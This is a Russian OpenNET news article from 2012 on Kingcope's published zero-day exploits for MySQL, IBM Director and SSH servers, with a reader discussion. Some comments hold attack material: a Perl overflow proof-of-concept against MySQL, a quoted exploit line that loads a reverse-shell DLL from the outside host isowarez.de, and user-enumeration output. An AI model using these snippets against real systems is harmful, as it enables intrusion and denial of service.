The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Опубликована серия эксплоитов для неисправленных уязвимостей в MySQL

02.12.2012 23:46

Некто, скрывающийся под псевдонимом "Kingcope", опубликовал в списке рассылки Full Disclosure семь "zero-day" эксплоитов, использующих неустранённые уязвимости в MySQL 5.1.x/5.5.x, а а также серию эксплоитов, поражающих продукты FreeSSHd, freeFTPd, IBM System Director и SSH (не путать с OpenSSH).

Отмеченные в эксплоитах уязвимости в MySQL теоретически позволяют удалённо осуществить повышение привилегий до администратора СУБД или получить доступ к выполнению команд на сервере (запуск shell). Проведение атаки требует наличие у злоумышленника возможности аутентифицированного подключения к СУБД, т.е. наличия аккаунта. Два эксплоита специфичны для платформы Windows (1, 2), а три поражают Linux-системы (1, 2, 3) и протестированы с последними версиями пакетов с MySQL из состава openSUSE, SUSE и Debian Lenny. Первый из эксплоитов для Linux для своей работы требует наличия прав FILE, а два остальных оформленны в виде демонстрационных прототипов, показывающих наличие уязвимости, но не позволяющих без доработки совершить атаку. Дополнительно опубликованы не требующие аутентификации эксплоиты для инициирования отказа в обслуживании и проверки наличия имени пользователя.

Так как обновления с устранением уязвимостей ещё не доступны, администраторам MySQL рекомендуется ограничить доступ к СУБД только с доверительных хостов. Проследить за выходом обновлений для популярных дистрибутивов можно на данных страницах: Ubuntu, Mandriva, Gentoo, openSUSE, CentOS, Scientific Linux, Fedora, RHEL, Debian, FreeBSD.

Интересны также уязвимости в FreeSSHd и в реализации SSH от компании SSH Communications Security Corp., в недрах которой был разработан протокол SSH, позволяющие пропустить фазу проверки пароля и войти в систему с любым паролем. Одновременно можно отметить несколько уязвимостей в библиотеке libssh, позволяющих инициировать крах из-за обращения к областям памяти за пределами буфера, что теоретически может быть использовано для организации выполнения кода злоумышленника.

Дополнение 1: Kingcope опубликовал технику достаточно быстрого локального или удалённого, при наличии аутентифицированного доступа, подбора паролей для аккаунта в MySQL. Скорость перебора составляет около 5000 комбинаций в секунду.

Дополнение 2: Вышли обновления MariaDB 5.5.28a, 5.3.11, 5.2.13 и 5.1.66, в которых устранена проблема CVE-2012-5579, позволяющая аутентифицированному пользователю запустить код с правами процесса mysqld.

  1. Главная ссылка к новости (http://seclists.org/fulldisclo...)
  2. OpenNews: MySQL теряет былую открытость - прекращена публикация тестовых наборов и лога изменений
  3. OpenNews: Опубликованы детали критической уязвимости в MySQL и MariaDB
  4. OpenNews: Непонятная ситуация с 0-day эксплоитом и 27 уязвимостями в MySQL
  5. OpenNews: Сайт MySQL.com взломан третий раз за год
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/35486-mysql
Ключевые слова: mysql, security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (48) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.4, Аноним (-), 00:08, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Работает, наверное :)
    % ./mysql_userenum_pl.bin 192.168.255.3 english.dic
    [*] HIT! -- USER EXISTS: !@192.168.255.3
     
  • 1.5, Аноним (-), 00:47, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Debian Lenny

    Тут нет ошибки? Именно Lenny?

     
     
  • 2.14, epic_fail (?), 04:16, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Скорее всего да. Видимо баги очень давние. Приватные.
     

  • 1.6, lemanyk (ok), 00:59, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    mysql настолько решето, что уже даже не смешно

    #!/usr/bin/perl
      use strict;
      use DBI();

      # Connect to the database.
      my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
                             "user", "secret",
                             {'RaiseError' => 1});

      $a ="A" x 100000;
      my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
      $sth->execute();
      
      # Disconnect from the database.
      $dbh->disconnect();

     
     
  • 2.7, lemanyk (ok), 01:02, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +6 +/
    шаред хостингам писец
     
     
  • 3.15, Аноним (-), 06:18, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Вот уж чего не жалко. Тупиковая ветвь эволюции.
     
     
  • 4.19, Georges (ok), 10:40, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Что предлагаете взамен?
     
     
  • 5.38, Аноним (-), 14:51, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Что предлагаете взамен?

    Облако без штанов :)))))))))))))

     

  • 1.8, Michael Shigorin (ok), 01:13, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Спрашивал днём в packagers@mysql, ответа пока не было (неудивительно): http://lists.mysql.com/packagers?date=2012-12
     
  • 1.9, commiethebeastie (ok), 01:21, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ни один не работает, все пишут access denied, несмотря на то, что логин, пароль и база правильные.
     
     
  • 2.11, myhand (ok), 01:42, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Ни один не работает, все пишут access denied, несмотря на то, что
    > логин, пароль и база правильные.

    "Ни один", блин...  Небось ровно один и протестировал - см. #10.

     

  • 1.10, myhand (ok), 01:40, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    mysql_privilege_elevation.pl - работает только ежели пользователю грант FILE дать...  // squeeze
     
  • 1.12, Михрютка (ok), 01:46, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    The following exploit will load the dll from
    \\isowarez.de\\director\wootwoot.dll
    the wootwoot.dll is a reverse shell that will send a shell back to the
    attacker (the code has to be inside the dll initialization routine).
    The IBM Director exploit works on versions 5.20.3 and before, but not
    on 5.2.30 SP2 and above.

    ну красава, чо. впрочем, если кто-то держит 4 года непатченый директор, да еще его в интернеты выставляет, я такому вазелин со склада не выдавал бы из принципа.

     
  • 1.17, Аноним (-), 09:01, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    > версиями пакетов с MySQL из состава Debian Lenny

                                          ^^^^^^^^^^^^
    О, свежачком запахло ...

     
     
  • 2.26, myhand (ok), 11:30, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    >> версиями пакетов с MySQL из состава Debian Lenny
    >     ^^^^^^^^^^^^
    >  О, свежачком запахло ...

    Для не умеющих читать самостоятельно балбесов: ошибки критичны для 5.0-5.5.  Так что достанется буквально всем.  Не нравится Lenny - можете попробовать на Squeeze, там 5.1.  Или Wheezy.

     
     
  • 3.28, Andrey Mitrofanov (?), 11:37, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Для не умеющих читать

    ..."""to be honest I didn't have a look into these optimizations and protections, it's hard enough to exploit it without these restrictions applied. seclists.org/fulldisclosure/2012/Dec/21

     

  • 1.18, Аноним (-), 09:48, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Хм, за это люди ещё и деньги платят...
     
  • 1.20, Аноним (-), 10:48, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников уже нет.
     
     
  • 2.21, Аноним (-), 10:50, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
    > уже нет.

    Любой нормальный оператор хостинга выставляет.

     
     
  • 3.23, Аноним (-), 11:09, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?
     
     
  • 4.24, Аноним (-), 11:19, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Сомнение. С localhost - да. Но сам слушатель разве выставлен наружу?

    Такое допустимо в локальной сети, если структура корпоративного приложения основана но толстых клиентах, а на сервере слушатель сидит на реальном IP адресе. У такой схемы, конечно, есть определенные преимущества.

    Если слушатель выставлен в Интернет - это глупость великая. Обычно между SQL сервером и внешним миром находится сервер приложений (java, PHP еtс), и SQL сервер непосредственно из сети никаким образом невидим. Он должен слушать только localhost. Если администрирование через phpMyAdmin, то это ничего не меняет.

     
  • 4.25, Туаук (?), 11:21, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Проблема в том что хомячки хотят доступ со своей персоналочки.
     
     
  • 5.31, Аноним (-), 12:18, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Проблема в том что хомячки хотят доступ со своей персоналочки.

    Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами, нужен носитель или засланный казачок. Что усложняет задачу на порядок.

     
     
  • 6.39, Аноним (-), 14:52, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    >> Проблема в том что хомячки хотят доступ со своей персоналочки.
    > Хотят. Но это обычно в локальной сети. Чтобы туда забраться с эксплойтами,
    > нужен носитель или засланный казачок. Что усложняет задачу на порядок.

    Ошибаешься. Нельзя взломать только совесть - да и то лишь у некоторых. (С)

     
  • 2.27, myhand (ok), 11:34, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
    > уже нет.

    Зачем в сеть?  Любой массовый виртуальный хостинг дает доступы своим клиентам.  Для эксплуатации - есть все, что нужно.  Стать клиентом можно за суммы =< 1$.

     
     
  • 3.29, Andrey Mitrofanov (?), 11:38, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    >  Для эксплуатации - есть все, что нужно.
    > Стать клиентом можно за суммы =< 1$.

    Найти дырявый php с sql-инджектом -- бесц^Hплатно.

     
     
  • 4.30, Аноним (-), 12:16, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Можно, но это не имеет отношения к сабжу.
     
     
  • 5.40, Andrey Mitrofanov (?), 15:04, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    >не имеет отношения к сабжу.

    Как и уплата $1.

     
  • 5.43, myhand (ok), 18:19, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Можно, но это не имеет отношения к сабжу.

    Еще как имеет, вьюнош.  Вам комикс нарисовать, чтобы наконец дошло?

     
  • 3.32, Аноним (-), 12:19, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
    >> уже нет.
    > Зачем в сеть?  Любой массовый виртуальный хостинг дает доступы своим клиентам.
    >  Для эксплуатации - есть все, что нужно.  Стать клиентом
    > можно за суммы =< 1$.

    Для определенности, что именно он дает? Дает белый IP адрес и сидящий на порту 3306 слушатель MySQL? Сильно сомневаюсь.

     
     
  • 4.36, angra (ok), 14:33, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Твое видение имеет очень далекое отношение к реальности, мускул открытый в мир вполне обычное явление для shared hosting. Но даже если случилось чудо и он закрыт для мира, то можно по-прежнему за копейки стать клиентом и получить к нему доступ.
     
  • 4.44, myhand (ok), 18:22, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Для определенности, что именно он дает?

    Дает базу (или несколько) и логин/пароль для доступа к ней.  Это позволит любому клиенту хостинга пойграться с предложенными скриптами.

    А посредством уязвимостей в ПО этого клиента, тех же SQL-инъекций - еще и неопределенно большой компании кулхацкеров.


     
  • 2.33, XoRe (ok), 13:02, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Кто-то выставляет SQL сервер (любой) голой ... в сеть? Думал, таких умников
    > уже нет.

    Вы даже не представляете, сколько хостеров в рунете держат 3306 порт открытым наружу.
    Включая самые крупные.
    А ещё over 9000 хостеров планеты.
    Это просто праздник для скрипткидисов.
    Грабь, убивай, ломай чужие хоумпаги!
    Короче, жесть.

     
     
  • 3.37, angra (ok), 14:35, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Даже если нет открытого в мир мускула, то есть phpmyadmin.
     

  • 1.34, Аноним (-), 13:48, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > протестированы с последними версиями пакетов с MySQL из состава openSUSE, SUSE и Debian Lenny.

    интересно зачем было тестировать дебьяновкий oldstable?

     
     
  • 2.35, тоже Аноним (ok), 14:07, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде не применяется, а давно и успешно используемые в реальной жизни системы.
     
     
  • 3.45, myhand (ok), 18:27, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Затем, что эксплойты затрагивают не свежак, который вчера написан и еще нигде
    > не применяется, а давно и успешно используемые в реальной жизни системы.

    Замечательно и "свежак" затрагивает.  обрати внимание на версии MySQL в статье.

    Lenny был помянут из-за того, что там тестировалась самая старая версия (5.0) из отобранных дистрибутивов.

    [сообщение отредактировано модератором]

     
     
  • 4.48, тоже Аноним (ok), 08:41, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    "Не только свежак", если угодно. Имелось в виду, что дыры в нестабильных версиях никого, кроме разработчиков, не волнуют. А вот в стабильных, да еще давно стабильных...
     
  • 2.50, Elhana (ok), 11:56, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    У firstvds например если кто создал vds с openvz года три назад и не переезжал, то он так на etch и остался.
     

  • 1.42, anonymousY (ok), 16:11, 03/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/

    Посмотрел эксплоиты, там либо "эксплуатируется" привилегия FILE, которая равносильно ADMIN на базу, либо PoC, не имеющие рабочей реализации из-за фильтрации ввода на соответствие  UTF, которые к тому же уже зарепорчены, и в MariaDB исправлены.
    Единственное интересное - DOS, но кого этим удивишь? При наличии аккаунта, базу раком поставить не сложно в любом случае.
     
     
  • 2.46, XoRe (ok), 22:41, 03/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > и в MariaDB исправлены.

    Не у всех MariaDB

     
     
  • 3.47, anonymous (??), 02:36, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/

    Для танкистов:
    эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.
     
     
  • 4.51, Аноним (-), 12:36, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и ломаного гроша не стоит.

    Для Windows эксплоиты рабочие, а для Linux кому нужно ума хватит довести до рабочего состояния.

     
  • 4.52, Аноним (-), 12:42, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и сущес... большой текст свёрнут, показать
     
     
  • 5.53, anonymousY (ok), 14:46, 04/12/2012 [^] [^^] [^^^] [ответить]  
  • +/

    >То, что опубликованы прототипы эксплоитов не отменяет наличие уязвимости и существование работающих эксплоитов.

    Наличие рабочих эксплоитов сомнительно, надо обмануть парсер utf. Теоретически возможно, но на практике почти нереально.

     
  • 4.55, XoRe (ok), 01:49, 05/12/2012 [^] [^^] [^^^] [ответить]  
  • +/
    > Для танкистов:
    > эксплойты PoC, рабочих в природе нет, и как сделать непонятно. "Новость" и
    > ломаного гроша не стоит.

    Ога.
    До публикации уязвимости вы, наверное, считали, что и уязвимости нет.
    В конце концов, неизвестный источник мог обнародовать _не_все_ дырки.

     
     
  • 5.56, demimurych (ok), 13:09, 05/12/2012 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Неизвестный источник слил никому ненужный мусор.

    PoC слили потому что способа реализовать атаку так и не нашли. Отдали общественности - может найдется гений и придумает способ.

     

  • 1.54, Анониимус (?), 15:56, 04/12/2012 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Крутотень. Уже поимел root доступ и положил пару хостеров.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру